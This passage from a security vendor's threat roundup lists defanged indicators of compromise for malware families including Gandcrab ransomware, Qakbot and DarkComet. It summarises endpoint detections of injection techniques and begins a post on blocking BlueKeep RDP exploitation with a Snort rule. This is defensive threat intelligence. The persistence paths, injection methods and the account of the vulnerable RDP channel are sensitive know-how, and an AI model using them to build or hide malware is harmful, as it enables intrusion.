  • 4f65fb3713b36e2c0eb64e8e77a3aa6bd3e4367ffd3184b179da869ff094cacc
  • 510f007b77f469f04508b716ab447ce6b2bdcb592aaf4854d236410e61009ee4
  • 598ec9fc1bede336d31abbeaa17ee90fec033e46ca742d16e17b25efa2bfe8dc
  • 5a217e950f27df7da794e729b22980c2aa1417696ffa1ee861ce9e657fd35bbb
  • 5c0a12520509cc3dced61c92a635e06dc369f5fe537f6dd74cde28a383beaaf8
  • 6850221b3ed9b438b4959fac2fa86ef2731267ecef2c539e128621a145f8f0b1
  • 720d9323f66abad23ddc1a0274f13ada330575fa1566fc87c81faad0983b2a72
  • 74b11951254ac75489460f573845fc5ddc84110b02585520cc175b02162c212e
  • 74bf67c7c1ed3eafd43b099b40d537ea115190c49e4e3e956e42702ea9aa904b
  • 7db9895829ef195f34659278d7f47618703cb2c535183f41dfc51a8263c7b4c5
  • 83b3bc37bf99bc56096c76ecfd19cb34a70d0d9656f926598625417b5c425fc7
  • 8691ab6505118b9ca2818db4e3ece4edcd40cedc4ba3b5a00dfbc7a1c12d58e6
  • 86a50c8e8f5d300f3731ebdce8b98be02696e2ff1d7e979abd873354bfd87006
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella, Malware

Txt.Downloader.Nemucod-6979968-0

Indicators of Compromise

Registry Keys  Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\System32 18
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\Configuration 18
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xi
18
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Client Server Runtime Subsystem
18
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xVersion
18
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xmode
16
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xpk
16
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xstate
16
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xcnt
16
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
14
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shst
14
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: sh1
14
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: xmail
9
<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION
Value Name: shsnt
9
Mutexes  Occurrences
N/A  -
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
194[.]109[.]206[.]212  9
95[.]216[.]12[.]141  9
104[.]18[.]35[.]131  9
104[.]16[.]154[.]36  8
104[.]16[.]155[.]36  8
86[.]59[.]21[.]38  7
104[.]18[.]34[.]131  7
208[.]83[.]223[.]34  6
154[.]35[.]32[.]5  6
171[.]25[.]193[.]9  6
128[.]31[.]0[.]39  5
193[.]23[.]244[.]244  5
76[.]73[.]17[.]194  5
62[.]173[.]145[.]104  3
85[.]93[.]145[.]251  3
131[.]188[.]40[.]189  3
138[.]201[.]169[.]12  2
78[.]129[.]150[.]54  2
82[.]192[.]94[.]125  2
134[.]19[.]177[.]109  2
109[.]234[.]165[.]77  2
173[.]254[.]213[.]13  2
94[.]73[.]147[.]165  1
148[.]251[.]155[.]108  1
212[.]237[.]210[.]8  1
See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
whatismyipaddress[.]com  16
opengraphprotocol[.]org  16
wsrs[.]net  16
whatsmyip[.]net  16
aff[.]ironsocket[.]com  16
cmsgear[.]com  16
www[.]zagogulina[.]com  2
api[.]w[.]org  1
gmpg[.]org  1
t[.]co  1
www[.]lagerpartner[.]dk  1
adasnature[.]rodevdesign[.]com  1
toolingguru[.]com  1
specialsedu[.]com  1
tuttyguru[.]com  1
hoiquanarsenal[.]000webhostapp[.]com  1
stakesedu[.]com  1
techjoomo[.]com  1
tbuild[.]2tstelecom[.]com  1
fruityytech[.]com  1
techyoun[.]com  1
www[.]adasnature[.]rodevdesign[.]com  1
trutthedu[.]com  1
essexweldmex[.]com  1
ashleyharrison[.]tech  1
See JSON for more IOCs
Files and/or directories created  Occurrences
%ProgramData%\Windows  18
%TEMP%\6893A5D897  18
%TEMP%\6893A5~1\lock  18
%ProgramData%\Windows\csrss.exe  18
%TEMP%\6893A5~1\state.tmp  18
%TEMP%\6893A5~1\unverified-microdesc-consensus.tmp  18
%TEMP%\6893A5~1\cached-certs.tmp  17
%TEMP%\6893A5~1\cached-microdesc-consensus.tmp  17
%TEMP%\6893A5~1\cached-microdescs.new  17
%TEMP%\6893A5~1\unverified-microdesc-consensus  17
E:\README10.txt  16
E:\README2.txt  16
E:\README5.txt  16
E:\README6.txt  16
E:\README7.txt  16
E:\README8.txt  16
E:\README9.txt  16
\README1.txt  16
\README10.txt  16
\README2.txt  16
\README3.txt  16
\README4.txt  16
\README5.txt  16
\README6.txt  16
\README7.txt  16
See JSON for more IOCs
File Hashes
  • 01446b1b8130f7e962e12ff9a50d5da8acb394be437f000d77f54e39527b7ab8
  • 0aa15df3fca9a49cf616d6ee3dbc9d29fde8f272466788a217e15c28ec6ef3f5
  • 19c6c4e0d94e88f3460549dca47715ba9f0f0e928f127eb45706c38d9979163b
  • 1e91a7eb97063517cb8798dafe93fb2f20eec7f4100b4175ec26c7f975aa6965
  • 1ed50005b56e0fd4828799e74bc5f78d2cc887934b891c23eb28d5b5cff14139
  • 37134b5f952e7c0108685d16963663687637ec006a86a15feee1afca36e8b765
  • 38be93101842cd74079121d4864d37f971cbad305c993ef2d465bb2bb6706d3d
  • 43d78a497d4fc7a500e33d09bda1b93097727c703b7a0ed698bda3b417efd7c4
  • 467be08133e9e2c683444bb21eef42864df9603cf22cde4ddf777a7d1c242362
  • 47b28eea9dc3aea93a1c361b3e5db6d1cf88021225c43ba364f11959a834049e
  • 54a6d6b359a4119a0009c2fec6f430a06df2aa6a0793b79feafe1a89b0e09010
  • 640f7ee70f167a82e02a174c8f084ecec19b7a5481b6f7e399dfd25ad64f4da5
  • 7b1d29992c3c9be33294af41981d48ba92a773f2d6bab6142d625aa5b7d96a7d
  • 856b8aed7661ec632ccdba1e738e990703a53dd241c99a1627df99ad5bd3a478
  • 869daf9d7e0ba9da47e604ca310022fa7aeb7a3a2ca7c1dc976958b634ab9cc5
  • 94c3139cb64e42264c87afd46f879702b45c33e6711d1777a4ce3faa134faecf
  • 986a7e2a2199640a2b156ad35a9313070bab0f89402bf9f6daff03c76748c76e
  • a3c8f9e92437fc83ad502f12eeb5aa97828b060168e50914aef6504961c82263
  • ab05542f803dfe04d1941ca646a3c9f10d04037475655bb1b9495dc82279fcd3
  • af66d0c9ab90be7dee01a389e351dc52a025be4579a7ef9cb290c4348c499cb6
  • be77578b063aeb67fa49b17d0474229e4573ab79e48d9d68e4250a063884d7c6
  • c22bb64479d12c5322e20c8cf88d7ddd68157d81b9211764a7f46e9096c56594
  • cf86b58dcc90b88df0f81d7e4db87e2c687baae11058924a74e91594ee8a0965
  • d6b029b0280f7c3e1a9be0dff1d9ce58e173b4fca568a80e62c69248398eed53
  • d93ad8604d87827ce1312c1640df2a49ba9f3c592ef9f779ae38eb76a9d95739
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Dropper.Qakbot-6984556-0

Indicators of Compromise

Registry Keys  Occurrences
N/A  -
Mutexes  Occurrences
ocmwn  36
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
N/A  -
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
N/A  -
Files and/or directories created  Occurrences
N/A  -
File Hashes
  • 0416a1f1118ca4e50afdee9c1e76cdca0b19e374d2be21ed1ea6cf96eadc6033
  • 0f70dc9c66a9bc37b7edfa1cb2d3566c53b63d67b8e8fd4c78f0f9ac08fc7a7b
  • 0fbd8df6ea3398aa3c7a139679fe60ab90766a4dd81e3ae6feface7a24061b31
  • 0fc09554d5f6f9059e6c251108caf5921db41ce23e791d418b4587108aae62db
  • 122f88c01202cc59a9cbb11b8eff11e4b1ff98b8a9e7956db2c0161bd633e451
  • 1df18b6c34f6eab5ba1de274793f94f6168016cfe00008db3a38d79031936b81
  • 25194a4d3d7b860d1c2a722eeccd45d7c6bedb3fe2967e83bd28e9b3ea6bb033
  • 2c738330714e592259d090d03400fa3cc4f2ae7f16b2e3616a5b8bc16e29c72e
  • 2de648c80d9122fc3081aabf4d6257e03fecb57d9fe6e1b98b4e79f28516b8a2
  • 2f769a70e02699e161593dc619e354028e3f3b23ea76cb8b493ef68595bc2b67
  • 3b24ecd81735aaa4c459aa8e5378595eb6bc043d607eeb90b56ba89a962f56a8
  • 40a186d85f12a21d4b65650ab513e723d0ebac79256307b6772257d4d9364188
  • 43b8424bdd21dfbfd81cfc4b2f31706f2bfd21c5d5dd99b17be2b78ceb3a98e2
  • 47d0d80d31c6b02e009585b97702fac60a958c5443a07ac62a68ef24b39bfcf4
  • 4a961cc37b6f6c9e650d4aefa99de46a564679783b5ebaf631b10ac0e891191d
  • 4ac3ceb7094c7c2a5edd95bb21a5b87e6f644cb03b0b72bb9f436623ec2b11d1
  • 4af9db7adad64a3ccffb37a051672cbd119524999968837300763d1f0143d218
  • 4b1becbe4702e8e370a3c0ba0d1ae6c3b0794de26b1db1730c609d2675f7edbd
  • 4c36e499054de9b6a674a54d809083b90ffef539a33f76ef49d7a1bfe89ddfd2
  • 56d8a1d419389fc826ca627bd62b90d8c1c78c1de9c906d73cc2f9a90aace0a6
  • 5931e1ea80e1b82dbf84db29d4bcdf01feecc7a0efb3fac05bc187abf29a588c
  • 61e2e922cae2ebed761d7ebc4e43e48821097821213216a17ec7690325c18f6f
  • 62679544133ce6ec6a09ac7b374cb3c51e82ad5486499467ad58b4115850f110
  • 66ef03a7d4628f9c40801b5ffd192376dce602214947e29f32d676f908c41d18
  • 70d91dbb7fb60dfcee3cfa585eed0efcdd25620bdb5ffffd8431e02876ee65dd
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Malware.Kryptik-6983260-1

Indicators of Compromise

Registry Keys  Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: drippt
25
Mutexes  Occurrences
3G1S91V5ZA5fB56W  25
8AZB70HDFK0WOZIZ  25
ATYNKAJP30Z9AQ  25
JKLSXX1ZA1QRLER  25
NHO9AZB7HDK0WAZMM  25
OMXBJSJ3WA1ZIN  25
PJOQT7WD1SAOM  25
PSHZ73VLLOAFB  25
VHO9AZB7HDK0WAZMM  25
VRK1AlIXBJDA5U3A  25
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
N/A  -
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
N/A  -
Files and/or directories created  Occurrences
N/A  -
File Hashes
  • 037a8cc036ef9b395300b6e56deb931f411d1fb498aefa1417fc5905f5a355b7
  • 0e699ed4adcd822951f647d9d34873eb45436d8e08f273c6edc271b3a28a63b3
  • 1693124dbb76c552ea96d94aeb56bcf673b29a4207be877743bc8e5b7404a9c5
  • 1c3eb8b78b435fb261296e5afe7eca9d2f898e75a953edad8eb4b8788875e5b6
  • 1cc0c215b78bc42e9926e822e8b3c05fca8dddfa23e6cbd245087309a9ac114c
  • 233dd554a6e99d66c3c5b03a60c25c5737b1da6a6fa13b3e594da1deb5c47dcd
  • 337b52e708905c51d83d570edd07379322270d6ef25a981a801776b2e60cf82a
  • 37ae2b35640423e3074277bf9c6f6e0f25d47251418b66ce9b37c76154164023
  • 3d2017ed5b3f99c43cc17ea72e95a4209be22d7cd0ed8c6b9d43add50628d6cc
  • 432ce20272510c1a6112aa246b0cb321976a299b054d2b82b94598ed59ee7f44
  • 4ac6c836b35945108c53f863e441e659baaf099279f06e0aa01d41f1739a980d
  • 4f2333d05cdb8293b85e64bbb891eb5a8ad1ab322babf8993b854e37135a8677
  • 513171233ab20f2e5f474ec0e00498a7e800c8c6d31f575ace21677e9a834667
  • 571cfa598f094ad73ff6237ae66c938cb2832bf04196442608107fc3b46a967f
  • 59010e05103e93fcb5bd33a0f13b8780720ac23694a1d12e4a5d59e3e8aa0984
  • 6067621b4ecf4018e42e5ed195a8e179a3e6c259025b6f248e6b8bbd2b205704
  • 6a73e94427c84a3e16e9c2c7ee4404ae93137cd08852fbb33dda67bacebbf0a6
  • 6c2c7bab2520d774d6054b789047916f59f741b561db2710351b96e36b10f000
  • 710436e038f3406ba539b2fdf91478ba44b4ac14e4738ef9dbc25fc0b2fe7105
  • 712119bcb97d93941e5668fe8977fdbf5a06eb435d7b611094a87caf54fffb72
  • 747c08074c51758e03b550d571830cbcdaaf0ce6ad6721d7d07de7f0f3df0b62
  • 8662a730cdb3d3303e5ae5ef9beafd74473487fac7f06542f0154cbbe56284f9
  • 8a5f573dd497c0d1adc337bf71f6a37b9b9cb0ba79607950c7fc92cc45508c16
  • 94bceae74cc733290eaa6830bfc61bfdeeafaf1d609439d5d9bc718b8ffc668a
  • 989eaa8e832dee1ea28452e91c30556ed1b84cb38d1381361770469c599db4ce
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid

Win.Ransomware.Gandcrab-6984356-1

Indicators of Compromise

Registry Keys  Occurrences
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: Wallpaper
3
<HKLM>\SOFTWARE\WOW6432NODE\ex_data 3
<HKLM>\SOFTWARE\WOW6432NODE\EX_DATA\data 3
<HKLM>\SOFTWARE\WOW6432NODE\keys_data 3
<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\data 3
<HKLM>\SOFTWARE\WOW6432NODE\EX_DATA\DATA
Value Name: ext
3
<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\DATA
Value Name: public
3
<HKLM>\SOFTWARE\WOW6432NODE\KEYS_DATA\DATA
Value Name: private
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\Notify 2
<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\system32\rundll32.exe
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\gctilof 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF
Value Name: Impersonate
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF
Value Name: Asynchronous
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF
Value Name: MaxWait
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF
Value Name: DllName
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\GCTILOF
Value Name: Startup
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gctilof
2
Mutexes  Occurrences
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A  20
Global\8B5BAAB9E36E4507C5F5.lock  3
Global\XlAKFoxSKGOfSGOoSFOOFNOLPE  3
A9MTX7ERFAMKLQ  2
A9ZLO3DAFRVH1WAE  2
AhY93G7iia  2
B81XZCHO7OLPA  2
BSKLZ1RVAUON  2
DRBCXMtx  2
F-DAH77-LLP  2
FNZIMLL1  2
FURLENTG3a  2
FstCNMutex  2
GJLAAZGJI156R  2
I-103-139-900557  2
I106865886KMTX  2
IGBIASAARMOAIZ  2
IGMJIA3OX  2
J8OSEXAZLIYSQ8J  2
LXCV0IMGIXS0RTA1  2
MKS8IUMZ13NOZ  2
NLYOPPSTY  2
OLZTR-AFHK11  2
OPLXSDF19WRQ  2
PLAX7FASCI8AMNA  2
See JSON for more IOCs
IP Addresses contacted by malware (does not indicate maliciousness)  Occurrences
104[.]31[.]71[.]122  10
192[.]42[.]119[.]41  4
185[.]62[.]170[.]1  3
52[.]17[.]9[.]185  3
217[.]26[.]54[.]189  3
83[.]166[.]148[.]69  3
217[.]26[.]53[.]37  3
213[.]186[.]33[.]5  3
136[.]243[.]162[.]140  3
195[.]201[.]207[.]213  3
188[.]165[.]40[.]130  3
46[.]32[.]228[.]22  3
185[.]58[.]214[.]106  3
185[.]51[.]191[.]29  3
149[.]126[.]4[.]15  3
193[.]200[.]231[.]4  3
194[.]51[.]187[.]23  3
83[.]166[.]138[.]8  3
5[.]144[.]168[.]210  3
136[.]243[.]13[.]215  3
83[.]138[.]82[.]107  3
192[.]185[.]159[.]253  3
193[.]246[.]63[.]157  3
149[.]126[.]4[.]89  3
194[.]51[.]187[.]22  3
See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness)  Occurrences
electrumscoin[.]org  10
PALKANKA[.]SITE  6
doa[.]wolexsal[.]at  5
www[.]cantinesurcoux[.]net  3
www[.]pizcam[.]com  3
www[.]hotel-blumental[.]com  3
www[.]arbezie[.]com  3
www[.]holzbock[.]biz  3
www[.]disch[.]mehrmarken[.]net  3
www[.]alpenlodge[.]com  3
www[.]hotelolden[.]com  3
www[.]hotellido-lugano[.]com  3
www[.]petit-paradis[.]com  3
www[.]hotelrotonde[.]com  3
www[.]2mmotorsport[.]biz  3
www[.]flemings-hotels[.]com  3
www[.]hardrockhoteldavos[.]com  3
www[.]bnbdelacolline[.]com  3
www[.]arbezie-hotel[.]com  3
www[.]mountainhostel[.]com  3
www[.]lassalle-haus[.]org  3
www[.]alimentarium[.]org  3
www[.]bellevuewiesen[.]com  3
www[.]kroneregensberg[.]com  3
www[.]waageglarus[.]com  3
See JSON for more IOCs
Files and/or directories created  Occurrences
%TEMP%\pidor.bmp  3
%HOMEPATH%\98b689da98b68e3f316.lock  3
%HOMEPATH%\AppData\98b689da98b68e3f316.lock  3
%APPDATA%\Media Center Programs\98b689da98b68e3f316.lock  3
%APPDATA%\Microsoft\98b689da98b68e3f316.lock  3
%APPDATA%\Microsoft\Internet Explorer\98b689da98b68e3f316.lock  3
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\98b689da98b68e3f316.lock  3
%APPDATA%\98b689da98b68e3f316.lock  3
%HOMEPATH%\Cookies\98b689da98b68e3f316.lock  3
%HOMEPATH%\Desktop\98b689da98b68e3f316.lock  3
%HOMEPATH%\Documents\98b689da98b68e3f316.lock  3
%HOMEPATH%\Documents\My Music\98b689da98b68e3f316.lock  3
%HOMEPATH%\Documents\My Pictures\98b689da98b68e3f316.lock  3
%HOMEPATH%\Documents\My Videos\98b689da98b68e3f316.lock  3
%HOMEPATH%\Downloads\98b689da98b68e3f316.lock  3
%HOMEPATH%\Favorites\98b689da98b68e3f316.lock  3
%HOMEPATH%\Links\98b689da98b68e3f316.lock  3
%HOMEPATH%\Music\98b689da98b68e3f316.lock  3
%HOMEPATH%\My Documents\98b689da98b68e3f316.lock  3
%HOMEPATH%\NetHood\98b689da98b68e3f316.lock  3
%HOMEPATH%\Pictures\98b689da98b68e3f316.lock  3
%HOMEPATH%\PrintHood\98b689da98b68e3f316.lock  3
%HOMEPATH%\Recent\98b689da98b68e3f316.lock  3
%HOMEPATH%\Saved Games\98b689da98b68e3f316.lock  3
%HOMEPATH%\SendTo\98b689da98b68e3f316.lock  3
See JSON for more IOCs
File Hashes
  • 0056173ac7818058a9ef3025473fceff24386f8dd61c23b3ca53f332b7b8b756
  • 010dd10aebe976dbf2473a656f0449c0a91aff6732d82fa605974d5452a1f882
  • 0c3a00f9adfbb35f60aa3a67e02ee7fe5f01464d08825c2a0b181c5553809484
  • 0cd7b76e663ef841a0468a4542f9594a212f682bda4fd13ac596c8dc375a70a1
  • 0dd538728ed3de4c0f112e503825028c6de6a19d176093b4f8ee2aba784e96e4
  • 12a9b70fb4e43716b450c37120a63c2da29e7a3c8657a95a1f318a4853550968
  • 157f96de23735d1c41df83f0a4deba3a4c64d7d0b15d4cce28a9166131e085bc
  • 19d7bab5cc8305e6fa1b248ceda3fb40dfe9d5256b1f8897350ccd2110c235d5
  • 259220ed0a5fadd095aee079bf2fb8fa27f2204f3ebe95b588014bf4654d925d
  • 411d66336a7a62138158211a0c9d47760cf072a86ea27cddfb173a59a4839a6e
  • 4446a42ec66656956467df28df5c1e587d4c4cfd804201ba9912fd5729bb8f64
  • 4b4f963ed8910f44f75ca75a2c21f7a31f600761bd97517246f7aa8f2ab5c4ff
  • 4c9cb943f1efb719c8bb4907d89fa296bb53f010e53fd8f1da09667be0055aaf
  • 50e6406dd568defee6835b152a2af2b82956004a87011d9da202648197dfaafe
  • 510fd9535d75bf55e09028dc6f015798c7050d39f60b9ed86f7ce392d08ccc36
  • 53248110e4f2ffb57520d2bbedc2cd4efe486c2a05243eb60807242bbfcbdd0e
  • 5a70e3f4169bfc369c5d6686eb5f6a3170b39dc4fa5196d39d2d9409075665cf
  • 5c562a47c8bb34f90f70377862dad9f134d6d5ae2d01595ea8225f51f8c7ed99
  • 618d93da49f253e9ece275eaf87c9639489d5f876dec9b1ce6fb14fc22d1c175
  • 66ef34785cdbbccb9cc46e69902d4e4f227134ddd2f8275430e3656480d79caa
  • 729c6ae5d8415d8b49c646807a4b95ddef38626bce3303cf08c4cdcc505196cf
  • 76151d8b9598ed85a90c04ce2b8c19fb93efc435b9982dd37565bdc92a494ad3
  • 7872ffcf0a320ec62c57954bb55158876958adf3c9a41ff470da476a13cbbef7
  • 796b0898478bb8ba453d4d974ab43aacf5c7e85bafa8e86133a284f47ab214d9
  • 8775ce35c810ebe3d2e0f8a9c84b77e38bd5d2d682a4e65a3fc9f9a86df52aa1
  • See JSON for more IOCs

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Malware.DarkComet-6983986-1

Indicators of Compromise

Registry Keys  Occurrences
<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{16E11FA4-EASQ-57E4-QPP4-4B4EE7V76IQ4} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: system32
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: system32
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{16E11FA4-EASQ-57E4-QPP4-4B4EE7V76IQ4}
Value Name: StubPath
1
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{0D285L58-7O12-HSU1-C880-04J8UU718520} 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WinUpdate
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: WinUpdate
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0D285L58-7O12-HSU1-C880-04J8UU718520}
Value Name: StubPath
1
<HKCU>\SOFTWARE\Cofer2 1
<HKCU>\SOFTWARE\COFER2
Value Name: FirstExecution
1
<HKCU>\SOFTWARE\COFER2
Value Name: NewIdentification
1
MutexesOccurrences
\BaseNamedObjects\_x_X_UPDATE_X_x_13
\BaseNamedObjects\_x_X_PASSWORDLIST_X_x_13
\BaseNamedObjects\_x_X_BLOCKMOUSE_X_x_13
\BaseNamedObjects\***MUTEX***4
\BaseNamedObjects\***MUTEX***_SAIR4
\BaseNamedObjects\***MUTEX***_PERSIST4
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
loucao22[.]no-ip[.]org1
Files and or directories createdOccurrences
%TEMP%\UuU.uUu4
%TEMP%\XX--XX--XX.txt4
%TEMP%\XxX.xXx4
%APPDATA%\logs.dat4
%System32%\install\server.exe2
%SystemRoot%\SysWOW64\install1
%SystemRoot%\install1
%SystemRoot%\SysWOW64\install\explore.exe1
%System32%\install\explore.exe1
%SystemRoot%\install\flashplayer.exe1
File Hashes

Coverage


Screenshots of Detection

AMP



ThreatGrid



Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Madshi injection detected (3512)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • Kovter injection detected (1779)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • PowerShell file-less infection detected (513)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (478)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (288)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Dealply adware detected (285)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Atom Bombing code injection technique detected (60)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Installcore adware detected (59)
    InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Suspicious PowerShell execution detected (55)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Excessively long PowerShell command detected (54)
    A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Using Firepower to defend against encrypted RDP attacks like BlueKeep

This blog was authored by Brandon Stultz
Microsoft recently released fixes for a critical pre-authentication remote code execution vulnerability in Remote Desktop Services, reached over the Remote Desktop Protocol (RDP). Identified as CVE-2019-0708 in May's Patch Tuesday, the vulnerability caught the attention of researchers and the media because it is "wormable," meaning an attack exploiting it could easily spread from one machine to another. This was discussed at length in episode 54 of our 'Beers with Talos' podcast.

Cisco Talos started reverse-engineering work immediately to determine how exactly RDP was vulnerable. Talos wrote and released coverage as soon as we were able to determine the vulnerability condition. SID 50137 for SNORT® correctly blocks exploitation of CVE-2019-0708 and scanning attempts that leverage this vulnerability.

This rule prevents exploitation of CVE-2019-0708 by blocking any RDP connection that attempts to use the "MS_T120" virtual channel. The RDP protocol defines virtual channels that can be used to transfer different kinds of data (e.g. clipboard, audio, etc.). In addition to these client-specified channels, Microsoft creates the "MS_T120" channel in the Windows RDP system. Clients are not expected to create the "MS_T120" channel. A remote unauthenticated attacker can exploit CVE-2019-0708 by sending crafted data to this internal channel.


Since RDP servers are not aware of which virtual channels the client supports, the client provides a list of desired channels in the connect-initial packet at the start of the RDP session.

Client --> Connection Request --> Server
Client <-- Connection Confirm <-- Server
-- Optionally switch transport to TLS --
Client --> MCS connect-initial --> Server
Client <-- MCS connect-response <-- Server

It is possible to specify in the RDP connection request that the client is TLS capable. In most cases, this causes the server to switch the connection to TLS after the Connection Confirm packet. This means that Cisco Firepower will only scan the virtual channel list in the encrypted case if TLS decryption is set up for RDP.
